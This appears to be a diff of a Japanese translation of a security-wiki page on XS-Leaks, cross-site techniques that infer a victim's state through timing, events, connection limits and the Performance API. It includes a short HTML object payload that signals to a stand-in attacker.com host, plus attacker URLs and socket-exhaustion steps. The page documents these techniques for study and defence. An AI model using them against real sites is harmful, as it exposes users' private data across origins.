+- **攻撃者のウェブ**: 攻撃者が作成した悪意のあるウェブサイトで、被害者が訪れ、エクスプロイトをホストしています。
+- **インクルージョンメソッド**: 脆弱なウェブを攻撃者のウェブに組み込むために使用される技術（例：window.open、iframe、fetch、hrefを持つHTMLタグなど）。
+- **リーク技術**: インクルージョンメソッドを通じて収集された情報に基づいて、脆弱なウェブの状態の違いを識別するために使用される技術。
+- **状態**: 攻撃者が区別しようとする脆弱なウェブの2つの潜在的な条件。
+- **検出可能な違い**: 攻撃者が脆弱なウェブの状態を推測するために依存する観察可能な変化。
 
 ### 検出可能な違い
 
-脆弱なWebの状態を区別するために分析できるいくつかの側面：
+脆弱なウェブの状態を区別するために分析できるいくつかの側面があります：
 
-- **ステータスコード**: サーバーエラー、クライアントエラー、または認証エラーなど、**さまざまなHTTPレスポンスステータスコード**をクロスオリジンで区別する。
-- **API使用**: 特定のJavaScript Web APIを使用しているかどうかを明らかにするために、ページ間での**Web APIの使用**を特定する。
-- **リダイレクト**: HTTPリダイレクトだけでなく、JavaScriptやHTMLによってトリガーされる異なるページへのナビゲーションを検出する。
-- **ページコンテンツ**: **HTTPレスポンスボディ**やページのサブリソースにおける**埋め込まれたフレームの数**や画像のサイズの違いなどの**変化を観察する**。
-- **HTTPヘッダー**: **特定のHTTPレスポンスヘッダー**の存在またはその値を記録する。X-Frame-Options、Content-Disposition、Cross-Origin-Resource-Policyなどのヘッダーを含む。
-- **タイミング**: 2つの状態間の一貫した時間の違いに気付く。
+- **ステータスコード**: サーバーエラー、クライアントエラー、または認証エラーなど、**さまざまなHTTPレスポンスステータスコード**をクロスオリジンで区別します。
+- **API使用**: 特定のJavaScript Web APIを使用しているかどうかを明らかにするために、ページ間での**Web APIの使用**を特定します。
+- **リダイレクト**: HTTPリダイレクトだけでなく、JavaScriptやHTMLによってトリガーされる異なるページへのナビゲーションを検出します。
+- **ページコンテンツ**: **HTTPレスポンスボディ**やページのサブリソースにおける**埋め込まれたフレームの数**や画像のサイズの違いなどの変化を観察します。
+- **HTTPヘッダー**: **特定のHTTPレスポンスヘッダー**の存在またはその値を記録します。これには、X-Frame-Options、Content-Disposition、Cross-Origin-Resource-Policyなどのヘッダーが含まれます。
+- **タイミング**: 2つの状態間の一貫した時間の違いに気づきます。
 
 ### インクルージョンメソッド
 
 - **HTML要素**: HTMLは、スタイルシート、画像、スクリプトなど、**クロスオリジンリソースのインクルージョン**のためのさまざまな要素を提供し、ブラウザに非HTMLリソースを要求させます。この目的のための潜在的なHTML要素の一覧は[https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks)で見つけることができます。
 - **フレーム**: **iframe**、**object**、および**embed**などの要素は、攻撃者のページにHTMLリソースを直接埋め込むことができます。ページが**フレーミング保護を欠いている**場合、JavaScriptはcontentWindowプロパティを介してフレーム化されたリソースのウィンドウオブジェクトにアクセスできます。
-- **ポップアップ**: **`window.open`**メソッドは、新しいタブまたはウィンドウでリソースを開き、JavaScriptがSOPに従ってメソッドやプロパティと対話するための**ウィンドウハンドル**を提供します。ポップアップは、シングルサインオンでよく使用され、ターゲットリソースのフレーミングおよびクッキー制限を回避します。ただし、最新のブラウザはポップアップの作成を特定のユーザーアクションに制限しています。
+- **ポップアップ**: **`window.open`**メソッドは、新しいタブまたはウィンドウでリソースを開き、JavaScriptがSOPに従ってメソッドやプロパティと対話するための**ウィンドウハンドル**を提供します。ポップアップは、シングルサインオンでよく使用され、ターゲットリソースのフレーミングおよびクッキー制限を回避します。ただし、現代のブラウザはポップアップの作成を特定のユーザーアクションに制限しています。
 - **JavaScriptリクエスト**: JavaScriptは、**XMLHttpRequests**や**Fetch API**を使用してターゲットリソースへの直接リクエストを許可します。これらのメソッドは、HTTPリダイレクトに従うかどうかを選択するなど、リクエストに対する正確な制御を提供します。
 
 ### リーク技術
@@ -49,7 +49,7 @@ XSinatorは、いくつかの既知のXS-Leaksに対してブラウザを**チ
 ツールには[**https://xsinator.com/**](https://xsinator.com/)で**アクセスできます**。
 
 > [!WARNING]
-> **除外されたXS-Leaks**: 他のリークに干渉するため、**サービスワーカー**に依存するXS-Leaksを除外する必要がありました。さらに、特定のWebアプリケーションの誤設定やバグに依存するXS-Leaksも**除外することにしました**。たとえば、CrossOrigin Resource Sharing (CORS)の誤設定、postMessageのリーク、またはCross-Site Scriptingです。さらに、時間ベースのXS-Leaksも除外しました。なぜなら、これらはしばしば遅く、ノイズが多く、不正確であるからです。
+> **除外されたXS-Leaks**: 他のリークに干渉するため、**サービスワーカー**に依存するXS-Leaksを除外する必要がありました。さらに、特定のウェブアプリケーションの誤設定やバグに依存するXS-Leaksも**除外することにしました**。たとえば、CrossOrigin Resource Sharing (CORS)の誤設定、postMessageリーク、またはCross-Site Scriptingです。さらに、時間ベースのXS-Leaksも除外しました。なぜなら、これらはしばしば遅く、ノイズが多く、不正確であるからです。
 
 ## **タイミングベースの技術**
 
@@ -66,16 +66,16 @@ XSinatorは、いくつかの既知のXS-Leaksに対してブラウザを**チ
 - **インクルージョンメソッド**: フレーム、HTML要素
 - **検出可能な違い**: ステータスコード
 - **詳細情報**: [https://www.usenix.org/conference/usenixsecurity19/presentation/staicu](https://www.usenix.org/conference/usenixsecurity19/presentation/staicu)、[https://xsleaks.dev/docs/attacks/error-events/](https://xsleaks.dev/docs/attacks/error-events/)
-- **概要**: リソースを読み込もうとすると、onerror/onloadイベントがトリガーされ、リソースが成功裏に/失敗して読み込まれたかどうかを判断することが可能です。
+- **概要**: リソースを読み込もうとすると、onerror/onloadイベントがトリガーされ、リソースが成功裏に/失敗して読み込まれたかどうかを判断することができます。
 - **コード例**: [https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)](<https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)>)
 
 {{#ref}}
 cookie-bomb-+-onerror-xs-leak.md
 {{#endref}}
 
-コード例は**JSからスクリプトオブジェクトを読み込もうとします**が、**他のタグ**（オブジェクト、スタイルシート、画像、オーディオなど）も使用できます。さらに、**タグを直接**挿入し、タグ内で`onload`および`onerror`イベントを宣言することも可能です（JSから挿入するのではなく）。
+コード例は、**JSからスクリプトオブジェクトを読み込もうとします**が、**他のタグ**（オブジェクト、スタイルシート、画像、オーディオなど）も使用できます。さらに、**タグを直接**挿入し、タグ内で`onload`および`onerror`イベントを宣言することも可能です（JSから挿入するのではなく）。
 
-この攻撃にはスクリプトなしのバージョンもあります：
+この攻撃には、スクリプトなしのバージョンもあります：
 ```html
 <object data="//example.com/404">
 <object data="//attacker.com/?error"></object>
@@ -97,7 +97,7 @@ performance.now-example.md
 
 #### Onload Timing + Forced Heavy Task
 
-この技術は前のものと同様ですが、**attacker** は **positive または negative の応答の際に関連する時間をかける** アクションを **強制** し、その時間を測定します。
+この技術は前のものと同じですが、**attacker** は **関連する時間** をかける **アクションを強制** し、**応答が肯定的または否定的** の場合にその時間を測定します。
 
 {{#ref}}
 performance.now-+-force-heavy-task.md
@@ -111,7 +111,7 @@ performance.now-+-force-heavy-task.md
 - **Summary:** [SharedArrayBuffer clock](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#sharedarraybuffer-and-web-workers) を使用して、リクエストを実行するのにかかる時間を測定できます。他の時計も使用できます。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
 
-リソースを取得するのにかかる時間は、[`unload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event) および [`beforeunload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event) イベントを利用して測定できます。**`beforeunload`** イベントは、ブラウザが新しいページに移動しようとしているときに発生し、**`unload`** イベントは、実際にナビゲーションが行われているときに発生します。これら2つのイベント間の時間差を計算することで、**ブラウザがリソースを取得するのにかかった時間**を特定できます。
+リソースを取得するのにかかる時間は、[`unload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event) および [`beforeunload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event) イベントを利用して測定できます。**`beforeunload`** イベントは、ブラウザが新しいページに移動しようとしているときに発生し、**`unload`** イベントは、実際にナビゲーションが行われているときに発生します。これら2つのイベント間の時間差を計算することで、**ブラウザがリソースを取得するのにかかった時間** を特定できます。
 
 ### Sandboxed Frame Timing + onload <a href="#sandboxed-frame-timing-attacks" id="sandboxed-frame-timing-attacks"></a>
 
@@ -134,25 +134,25 @@ performance.now-+-force-heavy-task.md
 - **Summary**: 正しいコンテンツにアクセスしたときにページがエラーを出し、任意のコンテンツにアクセスしたときに正しく読み込まれるようにできる場合、時間を測定することなくすべての情報を抽出するためのループを作成できます。
 - **Code Example**:
 
-ページに**秘密の**コンテンツを**Iframe内に**挿入できると仮定します。
+あなたが **iframe内に** **秘密の** コンテンツを持つ **ページを挿入** できると仮定します。
 
-被害者が**Iframe**を使用して"_**flag**_"を含むファイルを**検索**させることができます（例えば、CSRFを悪用）。Iframe内では、_**onloadイベント**_が**常に少なくとも1回は実行される**ことがわかっています。次に、**URL**の**iframe**を変更できますが、URL内の**ハッシュ**の**コンテンツ**のみを変更します。
+あなたは **被害者に** "_**flag**_" を含むファイルを **Iframe** を使って検索させることができます（例えば、CSRFを悪用する）。Iframe内では、_**onloadイベント**_ が **常に少なくとも一度は実行される** ことがわかっています。次に、**URL** の **iframe** を変更できますが、URL内の **ハッシュ** の **コンテンツ** のみを変更します。
 
 例えば：
 
 1. **URL1**: www.attacker.com/xssearch#try1
 2. **URL2**: www.attacker.com/xssearch#try2
 
-最初のURLが**正常に読み込まれた**場合、**URLのハッシュ**部分を**変更**すると、**onload**イベントは**再度トリガーされません**。しかし、ページが**読み込み時に何らかのエラー**を持っていた場合、**onload**イベントは**再度トリガーされます**。
+最初のURLが **正常に読み込まれた** 場合、**URLのハッシュ** 部分を **変更** すると、**onload** イベントは **再度トリガーされません**。しかし、ページが **読み込み時に何らかのエラー** を持っていた場合、**onload** イベントは **再度トリガーされます**。
 
-これにより、**正しく**読み込まれたページと、アクセス時に**エラー**が発生したページを**区別**できます。
+したがって、**正しく** 読み込まれたページと **エラー** が発生したページを **区別** できます。
 
 ### Javascript Execution
 
 - **Inclusion Methods**: Frames
 - **Detectable Difference**: ページコンテンツ
 - **More info**:
-- **Summary:** ページが**機密**コンテンツを**返す**場合、**または**ユーザーによって**制御**可能な**コンテンツ**を返す場合。ユーザーは**無効な場合に有効なJSコードを設定**し、各試行を**`<script>`**タグ内で**読み込む**ことができます。無効な場合、攻撃者の**コード**が**実行され**、有効な場合は**何も**実行されません。
+- **Summary:** **ページ** が **機密** コンテンツを **返す** か、ユーザーによって **制御** 可能な **コンテンツ** を返す場合。ユーザーは **無効な場合に有効なJSコードを設定** し、各試行を **`<script>`** タグ内で **読み込む** ことができます。したがって、**無効な** 場合には攻撃者の **コード** が **実行され**、**有効な** 場合には **何も** 実行されません。
 - **Code Example:**
 
 {{#ref}}
@@ -164,31 +164,31 @@ javascript-execution-xs-leak.md
 - **Inclusion Methods**: HTML Elements
 - **Detectable Difference**: ステータスコード & ヘッダー
 - **More info**: [https://xsleaks.dev/docs/attacks/browser-features/corb/](https://xsleaks.dev/docs/attacks/browser-features/corb/)
-- **Summary**: **Cross-Origin Read Blocking (CORB)**は、攻撃から保護するために特定の機密クロスオリジンリソースの読み込みを防ぐセキュリティ対策です。しかし、攻撃者はその保護動作を悪用できます。**CORB**の対象となる応答が`nosniff`と`2xx`ステータスコードを持つ_**CORB保護された**_ `Content-Type`を返すと、**CORB**は応答のボディとヘッダーを削除します。これを観察する攻撃者は、**ステータスコード**（成功またはエラーを示す）と`Content-Type`（**CORB**によって保護されているかどうかを示す）の組み合わせを推測し、潜在的な情報漏洩につながります。
+- **Summary**: **Cross-Origin Read Blocking (CORB)** は、攻撃から保護するために特定の機密クロスオリジンリソースの読み込みを防ぐセキュリティ対策です。しかし、攻撃者はその保護動作を悪用できます。**CORB** の対象となる応答が `nosniff` と `2xx` ステータスコードを持つ _**CORB保護された**_ `Content-Type` を返すと、**CORB** は応答のボディとヘッダーを削除します。これを観察する攻撃者は、**ステータスコード**（成功またはエラーを示す）と `Content-Type`（**CORB** によって保護されているかどうかを示す）の組み合わせを推測し、潜在的な情報漏洩につながります。
 - **Code Example**:
 
-攻撃に関する詳細情報は、詳細情報リンクを確認してください。
+攻撃に関する詳細情報は、より多くの情報リンクを確認してください。
 
 ### onblur
 
 - **Inclusion Methods**: Frames
 - **Detectable Difference**: ページコンテンツ
 - **More info**: [https://xsleaks.dev/docs/attacks/id-attribute/](https://xsleaks.dev/docs/attacks/id-attribute/), [https://xsleaks.dev/docs/attacks/experiments/portals/](https://xsleaks.dev/docs/attacks/experiments/portals/)
-- **Summary**: idまたはname属性から機密データを漏洩させます。
+- **Summary**: idまたはname属性から機密データを漏洩させる。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet](https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet)
 
-**iframe**内に**ページを読み込む**ことができ、**`#id_value`**を使用して、指定されたifのiframeの要素に**フォーカス**を当てることができます。次に、**`onblur`**信号がトリガーされると、ID要素が存在します。\
-同様の攻撃を**`portal`**タグで実行できます。
+**iframe内にページを読み込む** ことが可能で、**`#id_value`** を使用してページが指定された要素に **フォーカス** するようにし、次に **`onblur`** 信号がトリガーされると、ID要素が存在します。\
+同様の攻撃を **`portal`** タグで実行できます。
 
 ### postMessage Broadcasts <a href="#postmessage-broadcasts" id="postmessage-broadcasts"></a>
 
 - **Inclusion Methods**: Frames, Pop-ups
 - **Detectable Difference**: API使用
 - **More info**: [https://xsleaks.dev/docs/attacks/postmessage-broadcasts/](https://xsleaks.dev/docs/attacks/postmessage-broadcasts/)
-- **Summary**: postMessageから機密情報を収集するか、postMessagesの存在をオラクルとして使用してページ内のユーザーの状態を知る
+- **Summary**: postMessageから機密情報を収集するか、postMessagesの存在をオラクルとして使用してページ内のユーザーのステータスを知る
 - **Code Example**: `すべてのpostMessagesをリッスンする任意のコード。`
 
-アプリケーションは、異なるオリジン間で通信するために頻繁に[`postMessage`ブロードキャスト](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage)を利用します。しかし、この方法は、`targetOrigin`パラメータが適切に指定されていない場合、**機密情報**を不注意に露出させる可能性があります。さらに、メッセージを受信する行為自体が**オラクル**として機能する可能性があります。たとえば、特定のメッセージは、ログインしているユーザーにのみ送信される場合があります。したがって、これらのメッセージの存在または不在は、ユーザーの状態やアイデンティティに関する情報を明らかにする可能性があります。
+アプリケーションは、異なるオリジン間で通信するために頻繁に [`postMessage` broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) を利用します。しかし、この方法は、`targetOrigin` パラメータが適切に指定されていない場合、**機密情報** を不注意に露出させる可能性があります。さらに、メッセージを受信する行為自体が **オラクル** として機能する可能性があります。たとえば、特定のメッセージは、ログインしているユーザーにのみ送信される場合があります。したがって、これらのメッセージの存在または不在は、ユーザーの状態やアイデンティティに関する情報を明らかにする可能性があります。
 
 ## Global Limits Techniques
 
@@ -200,9 +200,9 @@ javascript-execution-xs-leak.md
 - **Summary**: WebSocket接続制限を使い果たすことで、クロスオリジンページのWebSocket接続数が漏洩します。
 - **Code Example**: [https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)>), [https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)>)
 
-ターゲットページが使用している**WebSocket接続の数**を特定することが可能です。これにより、攻撃者はアプリケーションの状態を検出し、WebSocket接続の数に関連する情報を漏洩させることができます。
+ターゲットページが使用している **WebSocket接続** の数を特定することが可能です。これにより、攻撃者はアプリケーションの状態を検出し、WebSocket接続の数に関連する情報を漏洩させることができます。
 
-1つの**オリジン**が**最大数のWebSocket**接続オブジェクトを使用している場合、接続状態に関係なく、新しいオブジェクトの作成は**JavaScript例外**を引き起こします。この攻撃を実行するために、攻撃者のウェブサイトはターゲットウェブサイトをポップアップまたはiframeで開き、ターゲットウェブが読み込まれた後、可能な限り最大数のWebSocket接続を作成しようとします。**スローされた例外の数**は、ターゲットウェブサイトの**WebSocket接続の数**です。
+ある **オリジン** が **最大数のWebSocket** 接続オブジェクトを使用している場合、接続状態に関係なく、新しいオブジェクトの作成は **JavaScript例外** を引き起こします。この攻撃を実行するために、攻撃者のウェブサイトはターゲットウェブサイトをポップアップまたはiframeで開き、その後、ターゲットウェブが読み込まれた後、可能な限り最大数のWebSocket接続を作成しようとします。**スローされた例外の数** は、ターゲットウェブサイトの **WebSocket接続の数** です。
 
 ### Payment API
 
@@ -212,39 +212,39 @@ javascript-execution-xs-leak.md
 - **Summary**: 支払いリクエストを検出します。なぜなら、同時にアクティブにできるのは1つだけだからです。
 - **Code Example**: [https://xsinator.com/testing.html#Payment%20API%20Leak](https://xsinator.com/testing.html#Payment%20API%20Leak)
 
-このXS-Leakは、攻撃者が**クロスオリジンページが支払いリクエストを開始したとき**を検出できるようにします。
+このXS-Leakは、攻撃者が **クロスオリジンページが支払いリクエストを開始したとき** を検出することを可能にします。
 
-**支払いリクエストは同時に1つだけアクティブ**にできるため、ターゲットウェブサイトがPayment Request APIを使用している場合、このAPIを使用しようとする**さらなる試みは失敗**し、**JavaScript例外**を引き起こします。攻撃者は、**定期的にPayment API UIを表示しようとする**ことでこれを悪用できます。1回の試行で例外が発生した場合、ターゲットウェブサイトは現在それを使用しています。攻撃者は、作成後すぐにUIを閉じることで、これらの定期的な試行を隠すことができます。
+**支払いリクエスト** APIを使用しているターゲットウェブサイトがある場合、**同時にアクティブにできるのは1つの支払いリクエストのみ** であるため、APIを使用しようとするさらなる試みは失敗し、**JavaScript例外** を引き起こします。攻撃者は、**定期的にPayment API UIを表示しようとする** ことでこれを悪用できます。1回の試行で例外が発生した場合、ターゲットウェブサイトは現在それを使用しています。攻撃者は、作成後すぐにUIを閉じることで、これらの定期的な試行を隠すことができます。
 
 ### Timing the Event Loop <a href="#timing-the-event-loop" id="timing-the-event-loop"></a>
 
 - **Inclusion Methods**:
 - **Detectable Difference**: タイミング（一般的にページコンテンツ、ステータスコードによる）
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop)
-- **Summary:** シングルスレッドのJSイベントループを悪用して、ウェブの実行時間を測定します。
+- **Summary:** 単一スレッドのJSイベントループを悪用して、ウェブの実行時間を測定します。
 - **Code Example**:
 
 {{#ref}}
 event-loop-blocking-+-lazy-images.md
 {{#endref}}
 
-JavaScriptは[シングルスレッドのイベントループ](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop)の同時実行モデルで動作し、**同時に1つのタスクしか実行できません**。この特性は、**異なるオリジンのコードが実行されるのにかかる時間を測定する**ために悪用できます。攻撃者は、固定プロパティを持つイベントを継続的に送信することで、イベントループ内で自分のコードの実行時間を測定できます。これらのイベントは、イベントプールが空のときに処理されます。他のオリジンも同じプールにイベントを送信している場合、**攻撃者は自分のタスクの実行の遅延を観察することで、これらの外部イベントが実行されるのにかかる時間を推測できます**。遅延を監視するこの方法は、異なるオリジンのコードの実行時間を明らかにし、機密情報を露出させる可能性があります。
+JavaScriptは、[単一スレッドのイベントループ](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop) 同時実行モデルで動作し、**一度に1つのタスクしか実行できません**。この特性は、**異なるオリジンからのコードの実行にかかる時間を測定するために悪用できます**。攻撃者は、固定プロパティを持つイベントを継続的に送信することで、イベントループ内で自分のコードの実行時間を測定できます。これらのイベントは、イベントプールが空のときに処理されます。他のオリジンも同じプールにイベントを送信している場合、**攻撃者は自分のタスクの実行の遅延を観察することで、これらの外部イベントの実行にかかる時間を推測できます**。遅延を監視するこの方法は、異なるオリジンからのコードの実行時間を明らかにし、機密情報を露出させる可能性があります。
 
 > [!WARNING]
-> 実行タイミングでは、**ネットワーク要因**を**排除**して**より正確な測定**を得ることが可能です。たとえば、ページを読み込む前に使用されるリソースを読み込むことによって。
+> 実行タイミングでは、**ネットワーク要因** を排除して **より正確な測定** を得ることが可能です。たとえば、ページを読み込む前に使用されるリソースを読み込むことによって。
 
 ### Busy Event Loop <a href="#busy-event-loop" id="busy-event-loop"></a>
 
 - **Inclusion Methods**:
 - **Detectable Difference**: タイミング（一般的にページコンテンツ、ステータスコードによる）
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop)
-- **Summary:** ウェブ操作の実行時間を測定する1つの方法は、スレッドのイベントループを意図的にブロックし、**イベントループが再び利用可能になるまでの時間を測定する**ことです。ブロッキング操作（長い計算や同期API呼び出しなど）をイベントループに挿入し、その後のコードが実行を開始するまでの時間を監視することで、ブロッキング期間中にイベントループで実行されていたタスクの期間を推測できます。この技術は、タスクが順次実行されるJavaScriptのシングルスレッドの性質を利用し、同じスレッドを共有する他の操作のパフォーマンスや動作に関する洞察を提供できます。
+- **Summary:** ウェブ操作の実行時間を測定する1つの方法は、スレッドのイベントループを意図的にブロックし、**イベントループが再び利用可能になるまでの時間を測定する** ことです。ブロッキング操作（長い計算や同期API呼び出しなど）をイベントループに挿入し、その後のコードが実行を開始するまでの時間を監視することで、ブロッキング期間中にイベントループで実行されていたタスクの期間を推測できます。この技術は、タスクが順次実行されるJavaScriptのイベントループの単一スレッドの性質を利用しており、同じスレッドを共有する他の操作のパフォーマンスや動作に関する洞察を提供できます。
 - **Code Example**:
 
-イベントループをロックして実行時間を測定する技術の大きな利点は、**サイトの分離**を回避できる可能性です。**サイトの分離**は、異なるウェブサイトを別々のプロセスに分けるセキュリティ機能であり、悪意のあるサイトが他のサイトから機密データに直接アクセスするのを防ぐことを目的としています。しかし、共有イベントループを通じて他のオリジンの実行タイミングに影響を与えることで、攻撃者はそのオリジンの活動に関する情報を間接的に抽出できます。この方法は、他のオリジンのデータに直接アクセスすることに依存せず、そのオリジンの活動が共有イベントループに与える影響を観察することで、**サイトの分離**によって確立された保護バリアを回避します。
+イベントループをロックして実行時間を測定する技術の大きな利点は、**サイトの分離** を回避できる可能性です。**サイトの分離** は、異なるウェブサイトを別々のプロセスに分けるセキュリティ機能であり、悪意のあるサイトが他のサイトから機密データに直接アクセスするのを防ぐことを目的としています。しかし、共有イベントループを通じて他のオリジンの実行タイミングに影響を与えることによって、攻撃者はそのオリジンの活動に関する情報を間接的に抽出できます。この方法は、他のオリジンのデータに直接アクセスすることに依存せず、そのオリジンの活動が共有イベントループに与える影響を観察することで、**サイトの分離** によって確立された保護バリアを回避します。
 
 > [!WARNING]
-> 実行タイミングでは、**ネットワーク要因**を**排除**して**より正確な測定**を得ることが可能です。たとえば、ページを読み込む前に使用されるリソースを読み込むことによって。
+> 実行タイミングでは、**ネットワーク要因** を排除して **より正確な測定** を得ることが可能です。たとえば、ページを読み込む前に使用されるリソースを読み込むことによって。
 
 ### Connection Pool
 
@@ -258,29 +258,29 @@ JavaScriptは[シングルスレッドのイベントループ](https://develope
 connection-pool-example.md
 {{#endref}}
 
-ブラウザはサーバー通信のためにソケットを利用しますが、オペレーティングシステムとハードウェアのリソースが限られているため、**ブラウザは同時接続数に制限を設けざるを得ません**。攻撃者は次の手順を通じてこの制限を悪用できます。
+ブラウザはサーバー通信のためにソケットを利用しますが、オペレーティングシステムとハードウェアのリソースが限られているため、**ブラウザは同時接続数に制限を設けざるを得ません**。攻撃者は次の手順を通じてこの制限を悪用できます：
 
 1. ブラウザのソケット制限を確認します。例えば、256のグローバルソケット。
 2. 255のソケットを長時間占有し、さまざまなホストに255のリクエストを開始し、接続を開いたままにします。
 3. 256番目のソケットを使用してターゲットページにリクエストを送信します。
-4. 別のホストに257番目のリクエストを試みます。すべてのソケットが使用中であるため（手順2と3に従って）、このリクエストはソケットが利用可能になるまでキューに入れられます。このリクエストが進行するまでの遅延は、256番目のソケット（ターゲットページのソケット）に関連するネットワーク活動のタイミング情報を攻撃者に提供します。この推測が可能なのは、手順2の255のソケットがまだ使用中であるため、新たに利用可能なソケットは手順3から解放されたものである必要があるからです。256番目のソケットが利用可能になるまでの時間は、ターゲットページへのリクエストが完了するのにかかる時間に直接関連しています。
+4. 別のホストに257番目のリクエストを試みます。すべてのソケットが使用中であるため（手順2と3に従って）、このリクエストはソケットが利用可能になるまでキューに入れられます。このリクエストが進行するまでの遅延は、256番目のソケット（ターゲットページのソケット）に関連するネットワーク活動に関するタイミング情報を攻撃者に提供します。この推測が可能なのは、手順2の255のソケットがまだ使用中であるため、新たに利用可能なソケットは手順3から解放されたものである必要があるからです。したがって、256番目のソケットが利用可能になるまでの時間は、ターゲットページへのリクエストが完了するのにかかる時間に直接関連しています。
 
-詳細情報については、[https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)を参照してください。
+詳細については、[https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/) を参照してください。
 
 ### Connection Pool by Destination
 
 - **Inclusion Methods**: JavaScript Requests
 - **Detectable Difference**: タイミング（一般的にページコンテンツ、ステータスコードによる）
 - **More info**:
-- **Summary:** 前の技術と似ていますが、すべてのソケットを使用するのではなく、Google **Chrome**は**同じオリジンに対して6つの同時リクエストの制限**を設けています。もし**5つをブロック**し、次に**6番目の**リクエストを**発信**すると、**タイミング**を測定でき、**被害者ページが**同じエンドポイントに**リクエストを送信**することに成功すれば、**6番目のリクエスト**は**遅くなり**、それを検出できます。
+- **Summary:** 前の技術と似ていますが、すべてのソケットを使用するのではなく、Google **Chrome** は **同じオリジンに対して6つの同時リクエストの制限** を設けています。もし **5つをブロック** し、次に **6番目の** リクエストを発信すると、**タイミング** を測定でき、**被害者ページが** 同じエンドポイントに **リクエストを送信** することに成功すれば、**6番目のリクエスト** は **遅くなり**、それを検出できます。
 
 ## Performance API Techniques
 
-[`Performance API`](https://developer.mozilla.org/en-US/docs/Web/API/Performance)は、ウェブアプリケーションのパフォーマンスメトリクスに関する洞察を提供し、[`Resource Timing API`](https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API)によってさらに強化されます。Resource Timing APIは、リクエストの期間など、詳細なネットワークリクエストのタイミングを監視することを可能にします。特に、サーバーが応答に`Timing-Allow-Origin: *`ヘッダーを含めると、転送サイズやドメインルックアップ時間などの追加データが利用可能になります。
+[`Performance API`](https://developer.mozilla.org/en-US/docs/Web/API/Performance) は、ウェブアプリケーションのパフォーマンスメトリクスに関する洞察を提供し、[`Resource Timing API`](https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API) によってさらに強化されます。Resource Timing APIは、リクエストの期間など、詳細なネットワークリクエストのタイミングを監視することを可能にします。特に、サーバーが応答に `Timing-Allow-Origin: *` ヘッダーを含めると、転送サイズやドメインルックアップ時間などの追加データが利用可能になります。
 
-この豊富なデータは、[`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries)や[`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName)などのメソッドを介して取得でき、パフォーマンス関連情報の包括的なビューを提供します。さらに、APIは[`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now)から取得したタイムスタンプの差を計算することで、実行時間の測定を容易にします。ただし、Chromeなどのブラウザでは、`performance.now()`の精度がミリ秒に制限される場合があり、タイミング測定の粒度に影響を与える可能性があります。
+この豊富なデータは、[`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries) や [`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName) などのメソッドを介して取得でき、パフォーマンス関連情報の包括的なビューを提供します。さらに、APIは、[`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) から取得したタイムスタンプの差を計算することによって、実行時間の測定を容易にします。ただし、Chromeなどのブラウザでは、`performance.now()` の精度がミリ秒に制限される場合があり、タイミング測定の粒度に影響を与える可能性があります。
 
-タイミング測定を超えて、Performance APIはセキュリティ関連の洞察にも利用できます。たとえば、Chromeの`performance`オブジェクトにページが存在するかどうかは、`X-Frame-Options`の適用を示す可能性があります。具体的には、`X-Frame-Options`によってフレーム内でのレンダリングがブロックされているページは、`performance`オブジェクトに記録されないため、ページのフレーミングポリシーに関する微妙な手がかりを提供します。
+タイミング測定を超えて、Performance APIはセキュリティ関連の洞察にも利用できます。たとえば、Chromeの `performance` オブジェクトにページが存在するかどうかは、`X-Frame-Options` の適用を示す可能性があります。具体的には、`X-Frame-Options` によってフレーム内でのレンダリングがブロックされているページは、`performance` オブジェクトに記録されないため、ページのフレーミングポリシーに関する微妙な手がかりを提供します。
 
 ### Error Leak
 
@@ -290,7 +290,7 @@ connection-pool-example.md
 - **Summary:** エラーを引き起こすリクエストはリソースタイミングエントリを作成しません。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Error%20Leak](https://xsinator.com/testing.html#Performance%20API%20Error%20Leak)
 
-HTTP応答ステータスコードを**区別**することが可能です。なぜなら、**エラー**を引き起こすリクエストは**パフォーマンスエントリを作成しない**からです。
+HTTP応答ステータスコードを **区別** することが可能です。なぜなら、**エラー** を引き起こすリクエストは **パフォーマンスエントリを作成しない** からです。
 
 ### Style Reload Error
 
@@ -300,7 +300,7 @@ HTTP応答ステータスコードを**区別**することが可能です。な
 - **Summary:** ブラウザのバグにより、エラーを引き起こすリクエストは2回読み込まれます。
